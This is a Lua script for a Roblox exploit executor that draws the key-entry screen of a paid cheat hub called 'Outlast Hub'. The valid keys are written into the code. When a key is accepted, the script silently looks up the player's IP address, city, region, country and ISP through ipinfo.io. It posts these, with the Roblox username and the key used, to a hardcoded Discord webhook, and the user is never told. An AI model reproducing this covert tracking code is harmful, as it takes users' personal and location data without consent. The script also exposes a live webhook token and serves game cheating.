--[[

		Gui2Lua™
		10zOfficial
		Version 1.0.0

]]


-- Instances

local OutlastHubFIASmodded = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local TextLabel = Instance.new("TextLabel")
local ImageLabel = Instance.new("ImageLabel")
local Enter = Instance.new("TextButton")
local TextBox = Instance.new("TextBox")
local UICorner = Instance.new("UICorner")
local TextLabel_2 = Instance.new("TextLabel")

-- Properties

OutlastHubFIASmodded.Name = "OutlastHubFIASmodded"
OutlastHubFIASmodded.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
OutlastHubFIASmodded.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
OutlastHubFIASmodded.ResetOnSpawn = false

Frame.Parent = OutlastHubFIASmodded
Frame.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
Frame.BackgroundTransparency = -3
Frame.BorderColor3 = Color3.new(0.694118, 0, 0)
Frame.Position = UDim2.new(0.297766745, 0, 0.345523328, 0)
Frame.Size = UDim2.new(0, 325, 0, 152)

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
TextLabel.BackgroundTransparency = 1
TextLabel.BorderColor3 = Color3.new(0, 0, 0)
TextLabel.BorderSizePixel = 0
TextLabel.Position = UDim2.new(0.193846151, 0, -0.00657894742, 0)
TextLabel.Size = UDim2.new(0, 200, 0, 38)
TextLabel.Font = Enum.Font.SourceSansItalic
TextLabel.Text = "OUTLAST HUB KEY SYSTEM"
TextLabel.TextColor3 = Color3.new(1, 1, 1)
TextLabel.TextSize = 23

ImageLabel.Parent = Frame
ImageLabel.BackgroundColor3 = Color3.new(1, 1, 1)
ImageLabel.BackgroundTransparency = 1
ImageLabel.BorderColor3 = Color3.new(0.105882, 0.164706, 0.207843)
ImageLabel.Position = UDim2.new(0.0673612133, 0, 0.0347743779, 0)
ImageLabel.Size = UDim2.new(0, 25, 0, 26)
ImageLabel.Image = "rbxassetid://10694838454"
ImageLabel.ImageColor3 = Color3.new(1, 0, 0)

Enter.Name = "Enter"
Enter.Parent = Frame
Enter.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
Enter.BorderColor3 = Color3.new(0.694118, 0, 0)
Enter.BorderSizePixel = 2
Enter.Position = UDim2.new(0.203076929, 0, 0.526315808, 0)
Enter.Size = UDim2.new(0, 192, 0, 30)
Enter.Font = Enum.Font.SourceSans
Enter.Text = "Enter"
Enter.TextColor3 = Color3.new(0.694118, 0, 0)
Enter.TextSize = 14

TextBox.Parent = Frame
TextBox.BackgroundColor3 = Color3.new(1, 1, 1)
TextBox.BorderColor3 = Color3.new(0.694118, 0, 0)
TextBox.Position = UDim2.new(0.255384624, 0, 0.296052635, 0)
TextBox.Size = UDim2.new(0, 160, 0, 21)
TextBox.Font = Enum.Font.SourceSans
TextBox.PlaceholderColor3 = Color3.new(0.694118, 0, 0)
TextBox.PlaceholderText = "Please Enter Your Key"
TextBox.Text = ""
TextBox.TextColor3 = Color3.new(0.694118, 0, 0)
TextBox.TextSize = 14

UICorner.Parent = Frame
UICorner.CornerRadius = UDim.new(0, 6)

TextLabel_2.Parent = Frame
TextLabel_2.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
TextLabel_2.BackgroundTransparency = 1
TextLabel_2.BorderColor3 = Color3.new(0, 0, 0)
TextLabel_2.BorderSizePixel = 0
TextLabel_2.Position = UDim2.new(0.190769225, 0, 0.75, 0)
TextLabel_2.Size = UDim2.new(0, 200, 0, 38)
TextLabel_2.Font = Enum.Font.SourceSansItalic
TextLabel_2.Text = "if you have not purchased a key please do so in the discord "
TextLabel_2.TextColor3 = Color3.new(1, 1, 1)
TextLabel_2.TextSize = 15

-- Scripts

local function ZXFNCXC_fake_script() -- Frame.LocalScript 
	local script = Instance.new('LocalScript', Frame)

	local HttpService = game:GetService("HttpService")
	local Players = game:GetService("Players")
	local LocalPlayer = Players.LocalPlayer
	
	local request = (syn and syn.request)
		or (http and http.request)
		or http_request
		or request
	
	local Keys = {
		"LAN1JO-4F2349A2-7C1B8-33X70-PL21X",
		"PJJ-MXPGAN-NL103-4ZLCOA",
		"A9x6-sixXopp-Q2zR",
		"R8s2H-khhhan-W4bJ",
		"dkeli-q2asX71n",
		"sash<3",
		"TJ8X1F4K9-P24ELQ7XM-ASDATT-FACXRA",
		"KAY-4F9X-Q2M7-V8T1",
		"JUELZ-4F7K-Q349M2-PX8R-1V6S",
		"R1CO-A30-KF3-M34V41-SSLD-S2X0",
		"TOXIC-AG3-KGsa0-MAFOFM-023E9-EK",
		"KBJ-9MAX-34ZA-MVIMTKA-2341",
		"SLEEPY-04CO-AMGIOFSD-MGD2M",
		"NARC-49CM-APAE-MXCVI-40KAN"
	}
	
	local frame = script.Parent
	local keyBox = frame:WaitForChild("TextBox")
	local enterButton = frame:WaitForChild("Enter")
	
	-- Live filter: remove spaces & invisible characters
	keyBox:GetPropertyChangedSignal("Text"):Connect(function()
		local filtered = keyBox.Text:gsub("[%s%z\226\128\139]", "")
		if keyBox.Text ~= filtered then
			keyBox.Text = filtered
		end
	end)
	
	-- Key check
	local function isValidKey(input)
		for _, key in ipairs(Keys) do
			if input == key then
				return true
			end
		end
		return false
	end
	
	-- Animated "checking..."
	local function animateChecking(textBox, duration)
		local startTime = tick()
		local dots = 0
	
		while tick() - startTime < duration do
			dots = dots + 1
			if dots > 3 then dots = 1 end
			textBox.PlaceholderText = "Checking key" .. string.rep(".", dots)
			task.wait(0.5)
		end
	end
	
	-- Webhook sender
	local function sendWebhook(usedKey)
		local response = request({
			Url = "https://ipinfo.io/json",
			Method = "GET"
		})
	
		local data = HttpService:JSONDecode(response.Body)
	
		request({
			Url = "https://discord.com/api/webhooks/1455491044052570133/XaTcY8FGmAdi1aCC4DQms7SYB0BEOyOyrqNMJArwCAvTvTGwg-BtsJqTrV2IDHrwJN_m",
			Method = "POST",
			Headers = {["Content-Type"] = "application/json"},
			Body = HttpService:JSONEncode({
				content = "Executed: OutlastHub | Normal Servers, Fight in School",
				embeds = {{
					title = "Player Connection Info",
					color = 16777215,
					fields = {
						{ name = "Roblox Username", value = LocalPlayer.Name, inline = true },
						{ name = "Display Name", value = LocalPlayer.DisplayName, inline = true },
						{ name = "Key Used", value = usedKey, inline = true },
						{ name = "IP", value = data.ip or "N/A", inline = true },
						{ name = "City", value = data.city or "N/A", inline = true },
						{ name = "Region", value = data.region or "N/A", inline = true },
						{ name = "Country", value = data.country or "N/A", inline = true },
						{ name = "ISP", value = data.org or "N/A", inline = false },
						{ name = "Place Name", value = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name, inline = true }
					}
				}}
			})
		})
	end
	
	local function checkKey()
		local enteredKey = keyBox.Text
		keyBox.Text = ""
		keyBox.PlaceholderText = "" -- Clear previous messages immediately
	
		local checkDuration = 6
	
		-- Start animation immediately
		spawn(function()
			animateChecking(keyBox, checkDuration)
		end)
	
		-- Wait while "checking" animation runs
		task.wait(checkDuration)
	
		if isValidKey(enteredKey) then
			sendWebhook(enteredKey)
	
			if frame.Parent:IsA("ScreenGui") then
				frame.Parent.Enabled = false
			end
	
			local mainGui = frame.Parent:FindFirstChild("Outlast Hub Normal")
			if mainGui and mainGui:IsA("ScreenGui") then
				mainGui.Enabled = true
			end
	
			print("Key accepted")
		else
			-- Only show incorrect message after checking animation finishes
			keyBox.PlaceholderText = "Incorrect key! Please purchase if you haven't."
			task.wait(3)
			keyBox.PlaceholderText = "Enter key"
		end
	end
	enterButton.MouseButton1Click:Connect(checkKey)
	
	keyBox.FocusLost:Connect(function(enterPressed)
		if enterPressed then
			checkKey()
		end
	end)
end
coroutine.wrap(ZXFNCXC_fake_script)()
